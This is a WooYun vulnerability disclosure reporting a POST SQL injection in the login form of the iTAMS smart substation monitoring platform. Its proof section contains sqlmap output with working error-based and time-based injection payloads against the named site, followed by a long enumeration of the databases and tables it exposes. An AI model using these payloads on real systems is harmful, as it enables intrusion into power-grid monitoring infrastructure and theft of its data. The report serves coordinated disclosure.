当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-099542

漏洞标题:某智能变电站监控系统sql注射

相关厂商:cncert国家互联网应急中心

漏洞作者: YY-2012

提交时间:2015-03-05 13:16

修复时间:2015-04-20 14:22

公开时间:2015-04-20 14:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-05: 细节已通知厂商并且等待厂商处理中
2015-03-10: 厂商已经确认,细节仅向厂商公开
2015-03-20: 细节向核心白帽子及相关领域专家公开
2015-03-30: 细节向普通白帽子公开
2015-04-09: 细节向实习白帽子公开
2015-04-20: 细节向公众公开

简要描述:

rt

详细说明:

iTAMS智能变电站监控平台
http://itams.com.cn/
登录框txtUserName存在post注入。

aaaaaaaaaaaa2222222222222.jpg

漏洞证明:

sqlmap identified the following injection points with a total of 255 HTTP(s) requests:
---
Parameter: txtUserName (POST)
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJMTkyMTY5NDMzD2QWAgIDD2QWAgIHDw8WAh4EVGV4dAUdKiDnlKjmiLflkI3miJblr4bnoIHplJnor6/vvIFkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUJaWJ0bkxvZ2luYGDRlB0xmoOBOJhlSqh1PTCfgeeFQ2gDUw/B4gklff8=&__EVENTVALIDATION=/wEWBALtie2XBgKl1bKzCQK1qbSWCwKBo5SvBSRwYSxRTT+Q99Y5PNJ45sTz5MZbRaOb6/C0jaB7TGAA&txtUserName=admin' AND EXTRACTVALUE(6496,CONCAT(0x5c,0x71767a7171,(SELECT (CASE WHEN (6496=6496) THEN 1 ELSE 0 END)),0x716b706b71)) AND 'fHDd'='fHDd&txtPassWord=123456&ibtnLogin.x=0&ibtnLogin.y=0
    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJMTkyMTY5NDMzD2QWAgIDD2QWAgIHDw8WAh4EVGV4dAUdKiDnlKjmiLflkI3miJblr4bnoIHplJnor6/vvIFkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUJaWJ0bkxvZ2luYGDRlB0xmoOBOJhlSqh1PTCfgeeFQ2gDUw/B4gklff8=&__EVENTVALIDATION=/wEWBALtie2XBgKl1bKzCQK1qbSWCwKBo5SvBSRwYSxRTT+Q99Y5PNJ45sTz5MZbRaOb6/C0jaB7TGAA&txtUserName=admin' AND 8737=BENCHMARK(5000000,MD5(0x50494841)) AND 'tWfU'='tWfU&txtPassWord=123456&ibtnLogin.x=0&ibtnLogin.y=0
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: MySQL 5.1
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: txtUserName (POST)
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJMTkyMTY5NDMzD2QWAgIDD2QWAgIHDw8WAh4EVGV4dAUdKiDnlKjmiLflkI3miJblr4bnoIHplJnor6/vvIFkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUJaWJ0bkxvZ2luYGDRlB0xmoOBOJhlSqh1PTCfgeeFQ2gDUw/B4gklff8=&__EVENTVALIDATION=/wEWBALtie2XBgKl1bKzCQK1qbSWCwKBo5SvBSRwYSxRTT+Q99Y5PNJ45sTz5MZbRaOb6/C0jaB7TGAA&txtUserName=admin' AND EXTRACTVALUE(6496,CONCAT(0x5c,0x71767a7171,(SELECT (CASE WHEN (6496=6496) THEN 1 ELSE 0 END)),0x716b706b71)) AND 'fHDd'='fHDd&txtPassWord=123456&ibtnLogin.x=0&ibtnLogin.y=0
    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJMTkyMTY5NDMzD2QWAgIDD2QWAgIHDw8WAh4EVGV4dAUdKiDnlKjmiLflkI3miJblr4bnoIHplJnor6/vvIFkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUJaWJ0bkxvZ2luYGDRlB0xmoOBOJhlSqh1PTCfgeeFQ2gDUw/B4gklff8=&__EVENTVALIDATION=/wEWBALtie2XBgKl1bKzCQK1qbSWCwKBo5SvBSRwYSxRTT+Q99Y5PNJ45sTz5MZbRaOb6/C0jaB7TGAA&txtUserName=admin' AND 8737=BENCHMARK(5000000,MD5(0x50494841)) AND 'tWfU'='tWfU&txtPassWord=123456&ibtnLogin.x=0&ibtnLogin.y=0
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: MySQL 5.1
Database: tlms
[31 tables]
+----------------------------+
| alarmevents                |
| cameradata                 |
| curcameradata              |
| curswaypathdata            |
| curvibrationcurvedata      |
| dirtinessdata              |
| equipmentstate             |
| hisalarmevents             |
| hisequipmentstate          |
| icingdata                  |
| lmequip                    |
| lmgroup                    |
| lmline                     |
| lmsignal                   |
| lmtype                     |
| ltemperaturedata           |
| manaoperaterecord          |
| oslevel                    |
| ospicture                  |
| ossignal                   |
| ostype                     |
| runsigdata                 |
| sagdata                    |
| swaydata                   |
| swaypathdata               |
| towerleandata              |
| userinfo                   |
| vibrationcurvedata         |
| vibrationdata              |
| weatherdata                |
| windageyawdata             |
+----------------------------+
Database: beijing
[33 tables]
+----------------------------+
| alarmevents                |
| cameradata                 |
| curcameradata              |
| curswaypathdata            |
| curvibrationcurvedata      |
| dirtinessdata              |
| equipmentstate             |
| hisalarmevents             |
| hisequipmentstate          |
| icingdata                  |
| lmequip                    |
| lmgroup                    |
| lmline                     |
| lmsignal                   |
| lmtype                     |
| ltemperaturedata           |
| manaoperaterecord          |
| oslevel                    |
| ospicture                  |
| ossignal                   |
| ostype                     |
| runsigdata                 |
| sagdata                    |
| swaydata                   |
| swaypathdata               |
| towerleandata              |
| userinfo                   |
| vibrationcurvedata         |
| vibrationdata              |
| videoequip                 |
| videorel                   |
| weatherdata                |
| windageyawdata             |
+----------------------------+
Database: 11ta
[33 tables]
+----------------------------+
| alarmevents                |
| cameradata                 |
| curcameradata              |
| curswaypathdata            |
| curvibrationcurvedata      |
| dirtinessdata              |
| equipmentstate             |
| hisalarmevents             |
| hisequipmentstate          |
| icingdata                  |
| lmequip                    |
| lmgroup                    |
| lmline                     |
| lmsignal                   |
| lmtype                     |
| ltemperaturedata           |
| manaoperaterecord          |
| oslevel                    |
| ospicture                  |
| ossignal                   |
| ostype                     |
| runsigdata                 |
| sagdata                    |
| swaydata                   |
| swaypathdata               |
| towerleandata              |
| userinfo                   |
| vibrationcurvedata         |
| vibrationdata              |
| videoequip                 |
| videorel                   |
| weatherdata                |
| windageyawdata             |
+----------------------------+
Database: wuhantlms
[33 tables]
+----------------------------+
| alarmevents                |
| cameradata                 |
| curcameradata              |
| curswaypathdata            |
| curvibrationcurvedata      |
| dirtinessdata              |
| equipmentstate             |
| hisalarmevents             |
| hisequipmentstate          |
| icingdata                  |
| lmequip                    |
| lmgroup                    |
| lmline                     |
| lmsignal                   |
| lmtype                     |
| ltemperaturedata           |
| manaoperaterecord          |
| oslevel                    |
| ospicture                  |
| ossignal                   |
| ostype                     |
| runsigdata                 |
| sagdata                    |
| swaydata                   |
| swaypathdata               |
| towerleandata              |
| userinfo                   |
| vibrationcurvedata         |
| vibrationdata              |
| videoequip                 |
| videorel                   |
| weatherdata                |
| windageyawdata             |
+----------------------------+
Database: performance_schema
[46 tables]
+----------------------------+
| accounts                   |
| cond_instances             |
| events_stages_current      |
| events_stages_history      |
| events_stages_history_long |
| events_stages_summary_by_a |
| events_stages_summary_by_h |
| events_stages_summary_by_t |
| events_stages_summary_by_u |
| events_stages_summary_glob |
| events_statements_currentq |
| events_statements_history_ |
| events_statements_historyq |
| events_statements_summary_ |
| events_waits_current       |
| events_waits_history       |
| events_waits_history_longq |
| events_waits_summary_by_ac |
| events_waits_summary_by_ho |
| events_waits_summary_by_in |
| events_waits_summary_by_th |
| events_waits_summary_by_us |
| events_waits_summary_globa |
| file_instances             |
| file_summary_by_event_name |
| file_summary_by_instance   |
| host_cache                 |
| hosts                      |
| mutex_instances            |
| objects_summary_global_by_ |
| performance_timers         |
| rwlock_instances           |
| session_account_connect_at |
| session_connect_attrs      |
| setup_actors               |
| setup_consumers            |
| setup_instruments          |
| setup_objects              |
| setup_timers               |
| socket_instances           |
| socket_summary_by_event_na |
| socket_summary_by_instance |
| table_io_waits_summary_by_ |
| table_lock_waits_summary_b |
| threads                    |
| users                      |
+----------------------------+
Database: tlms-beijing
[31 tables]
+----------------------------+
| alarmevents                |
| cameradata                 |
| curcameradata              |
| curswaypathdata            |
| curvibrationcurvedata      |
| dirtinessdata              |
| equipmentstate             |
| hisalarmevents             |
| hisequipmentstate          |
| icingdata                  |
| lmequip                    |
| lmgroup                    |
| lmline                     |
| lmsignal                   |
| lmtype                     |
| ltemperaturedata           |
| manaoperaterecord          |
| oslevel                    |
| ospicture                  |
| ossignal                   |
| ostype                     |
| runsigdata                 |
| sagdata                    |
| swaydata                   |
| swaypathdata               |
| towerleandata              |
| userinfo                   |
| vibrationcurvedata         |
| vibrationdata              |
| weatherdata                |
| windageyawdata             |
+----------------------------+
Database: mysql
[41 tables]
+----------------------------+
| user                       |
| akbstf                     |
| columns_priv               |
| db                         |
| ekdbqk                     |
| event                      |
| fikkag                     |
| func                       |
| general_log                |
| help_category              |
| help_keyword               |
| help_relation              |
| help_topic                 |
| innodb_index_stats         |
| innodb_table_stats         |
| iwwoig                     |
| kxtsom                     |
| ndb_binlog_index           |
| oaigce                     |
| plugin                     |
| proc                       |
| procs_priv                 |
| proxies_priv               |
| pvsouh                     |
| servers                    |
| sjbwda                     |
| slave_master_info          |
| slave_relay_log_info       |
| slave_worker_info          |
| slow_log                   |
| tables_priv                |
| tempmix4                   |
| time_zone                  |
| time_zone_leap_second      |
| time_zone_name             |
| time_zone_transition       |
| time_zone_transition_typeq |
| vaaxvz                     |
| vricta                     |
| vuecev                     |
| xrnliz                     |
+----------------------------+
Database: tlms-test
[31 tables]
+----------------------------+
| alarmevents                |
| cameradata                 |
| curcameradata              |
| curswaypathdata            |
| curvibrationcurvedata      |
| dirtinessdata              |
| equipmentstate             |
| hisalarmevents             |
| hisequipmentstate          |
| icingdata                  |
| lmequip                    |
| lmgroup                    |
| lmline                     |
| lmsignal                   |
| lmtype                     |
| ltemperaturedata           |
| manaoperaterecord          |
| oslevel                    |
| ospicture                  |
| ossignal                   |
| ostype                     |
| runsigdata                 |
| sagdata                    |
| swaydata                   |
| swaypathdata               |
| towerleandata              |
| userinfo                   |
| vibrationcurvedata         |
| vibrationdata              |
| weatherdata                |
| windageyawdata             |
+----------------------------+
Database: itams1.3
[42 tables]
+----------------------------+
| cfgequipment               |
| cfghouse                   |
| cfgport                    |
| cfgrfidreader              |
| cfgrfidtag                 |
| cfgsamplerunit             |
| cfgsignal                  |
| cfgstation                 |
| cfgstreamsrv               |
| cfgvideo                   |
| cfgvideorel                |
| cfgvideosrv                |
| cfgworkstation             |
| clerktype                  |
| controlqueue               |
| doorctlunitevents          |
| doorctlunitoperate         |
| hisalarmdata               |
| hiscontrolqueue            |
| hisdata                    |
| manaclerk                  |
| manaoperaterecord          |
| manaservice                |
| manaset                    |
| oscondctrl                 |
| osdevstatecond             |
| oslevel                    |
| ospicture                  |
| ossignal                   |
| ostype                     |
| osuserpower                |
| osvideo                    |
| rfidrecd                   |
| runalarmmsge               |
| stationworkers             |
| stdclass                   |
| stdcondition               |
| stdmsge                    |
| stdpart                    |
| stdsampler                 |
| stdtype                    |
| workersdoorcard            |
+----------------------------+
Database: sh
[33 tables]
+----------------------------+
| alarmevents                |
| cameradata                 |
| curcameradata              |
| curswaypathdata            |
| curvibrationcurvedata      |
| dirtinessdata              |
| equipmentstate             |
| hisalarmevents             |
| hisequipmentstate          |
| icingdata                  |
| lmequip                    |
| lmgroup                    |
| lmline                     |
| lmsignal                   |
| lmtype                     |
| ltemperaturedata           |
| manaoperaterecord          |
| oslevel                    |
| ospicture                  |
| ossignal                   |
| ostype                     |
| runsigdata                 |
| sagdata                    |
| swaydata                   |
| swaypathdata               |
| towerleandata              |
| userinfo                   |
| vibrationcurvedata         |
| vibrationdata              |
| videoequip                 |
| videorel                   |
| weatherdata                |
| windageyawdata             |
+----------------------------+
Database: shanghai
[31 tables]
+----------------------------+
| alarmevents                |
| cameradata                 |
| curcameradata              |
| curswaypathdata            |
| curvibrationcurvedata      |
| dirtinessdata              |
| equipmentstate             |
| hisalarmevents             |
| hisequipmentstate          |
| icingdata                  |
| lmequip                    |
| lmgroup                    |
| lmline                     |
| lmsignal                   |
| lmtype                     |
| ltemperaturedata           |
| manaoperaterecord          |
| oslevel                    |
| ospicture                  |
| ossignal                   |
| ostype                     |
| runsigdata                 |
| sagdata                    |
| swaydata                   |
| swaypathdata               |
| towerleandata              |
| userinfo                   |
| vibrationcurvedata         |
| vibrationdata              |
| weatherdata                |
| windageyawdata             |
+----------------------------+
Database: sakila
[23 tables]
+----------------------------+
| language                   |
| actor                      |
| actor_info                 |
| address                    |
| category                   |
| city                       |
| country                    |
| customer                   |
| customer_list              |
| film                       |
| film_actor                 |
| film_category              |
| film_list                  |
| film_text                  |
| inventory                  |
| nicer_but_slower_film_list |
| payment                    |
| rental                     |
| sales_by_film_category     |
| sales_by_store             |
| staff                      |
| staff_list                 |
| store                      |
+----------------------------+
Database: information_schema
[59 tables]
+----------------------------+
| CHARACTER_SETS             |
| COLLATIONS                 |
| COLLATION_CHARACTER_SET_AP |
| COLUMNS                    |
| COLUMN_PRIVILEGES          |
| ENGINES                    |
| EVENTS                     |
| FILES                      |
| GLOBAL_STATUS              |
| GLOBAL_VARIABLES           |
| INNODB_BUFFER_PAGE         |
| INNODB_BUFFER_PAGE_LRU     |
| INNODB_BUFFER_POOL_STATS   |
| INNODB_CMP                 |
| INNODB_CMPMEM              |
| INNODB_CMPMEM_RESET        |
| INNODB_CMP_PER_INDEX       |
| INNODB_CMP_PER_INDEX_RESET |
| INNODB_CMP_RESET           |
| INNODB_FT_BEING_DELETED    |
| INNODB_FT_CONFIG           |
| INNODB_FT_DEFAULT_STOPWORD |
| INNODB_FT_DELETED          |
| INNODB_FT_INDEX_CACHE      |
| INNODB_FT_INDEX_TABLE      |
| INNODB_LOCKS               |
| INNODB_LOCK_WAITS          |
| INNODB_METRICS             |
| INNODB_SYS_COLUMNS         |
| INNODB_SYS_DATAFILES       |
| INNODB_SYS_FIELDS          |
| INNODB_SYS_FOREIGN         |
| INNODB_SYS_FOREIGN_COLS    |
| INNODB_SYS_INDEXES         |
| INNODB_SYS_TABLES          |
| INNODB_SYS_TABLESPACES     |
| INNODB_SYS_TABLESTATS      |
| INNODB_TRX                 |
| KEY_COLUMN_USAGE           |
| OPTIMIZER_TRACE            |
| PARAMETERS                 |
| PARTITIONS                 |
| PLUGINS                    |
| PROCESSLIST                |
| PROFILING                  |
| REFERENTIAL_CONSTRAINTS    |
| ROUTINES                   |
| SCHEMATA                   |
| SCHEMA_PRIVILEGES          |
| SESSION_STATUS             |
| SESSION_VARIABLES          |
| STATISTICS                 |
| TABLES                     |
| TABLESPACES                |
| TABLE_CONSTRAINTS          |
| TABLE_PRIVILEGES           |
| TRIGGERS                   |
| USER_PRIVILEGES            |
| VIEWS                      |
+----------------------------+
Database: 1.1
[33 tables]
+----------------------------+
| alarmevents                |
| cameradata                 |
| curcameradata              |
| curswaypathdata            |
| curvibrationcurvedata      |
| dirtinessdata              |
| equipmentstate             |
| hisalarmevents             |
| hisequipmentstate          |
| icingdata                  |
| lmequip                    |
| lmgroup                    |
| lmline                     |
| lmsignal                   |
| lmtype                     |
| ltemperaturedata           |
| manaoperaterecord          |
| oslevel                    |
| ospicture                  |
| ossignal                   |
| ostype                     |
| runsigdata                 |
| sagdata                    |
| swaydata                   |
| swaypathdata               |
| towerleandata              |
| userinfo                   |
| vibrationcurvedata         |
| vibrationdata              |
| videoequip                 |
| videorel                   |
| weatherdata                |
| windageyawdata             |
+----------------------------+
Database: world
[3 tables]
+----------------------------+
| city                       |
| country                    |
| countrylanguage            |
+----------------------------+
Database: hndnms
[54 tables]
+----------------------------+
| alarmevents                |
| cameradata                 |
| curcameradata              |
| curswaypathdata            |
| curvibrationcurvedata      |
| dirtinessdata              |
| equipmentstate             |
| hd_device_cam              |
| hd_device_group            |
| hd_device_group_detail     |
| hd_device_ioport           |
| hd_device_route            |
| hd_log_alarm               |
| hd_log_event               |
| hd_log_sys                 |
| hd_log_upgrade             |
| hd_map                     |
| hd_map_element             |
| hd_ptz_cruise              |
| hd_ptz_preset              |
| hd_r_role                  |
| hd_r_user                  |
| hd_res_depart              |
| hd_res_device              |
| hd_res_right               |
| hd_res_server              |
| hd_res_type                |
| hd_strategy_info           |
| hd_vendor                  |
| hd_vendor_product          |
| hisalarmevents             |
| hisequipmentstate          |
| icingdata                  |
| lmequip                    |
| lmgroup                    |
| lmline                     |
| lmsignal                   |
| lmtype                     |
| ltemperaturedata           |
| manaoperaterecord          |
| oslevel                    |
| ospicture                  |
| ossignal                   |
| ostype                     |
| runsigdata                 |
| sagdata                    |
| swaydata                   |
| swaypathdata               |
| towerleandata              |
| userinfo                   |
| vibrationcurvedata         |
| vibrationdata              |
| weatherdata                |
| windageyawdata             |
+----------------------------+
Database: shanghai-tlms
[33 tables]
+----------------------------+
| alarmevents                |
| cameradata                 |
| curcameradata              |
| curswaypathdata            |
| curvibrationcurvedata      |
| dirtinessdata              |
| equipmentstate             |
| hisalarmevents             |
| hisequipmentstate          |
| icingdata                  |
| lmequip                    |
| lmgroup                    |
| lmline                     |
| lmsignal                   |
| lmtype                     |
| ltemperaturedata           |
| manaoperaterecord          |
| oslevel                    |
| ospicture                  |
| ossignal                   |
| ostype                     |
| runsigdata                 |
| sagdata                    |
| swaydata                   |
| swaypathdata               |
| towerleandata              |
| userinfo                   |
| vibrationcurvedata         |
| vibrationdata              |
| videoequip                 |
| videorel                   |
| weatherdata                |
| windageyawdata             |
+----------------------------+

修复方案:

联系厂商

版权声明:转载请注明来源 YY-2012@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-03-10 13:08

厂商回复:

最新状态:

暂无

漏洞评价:

评论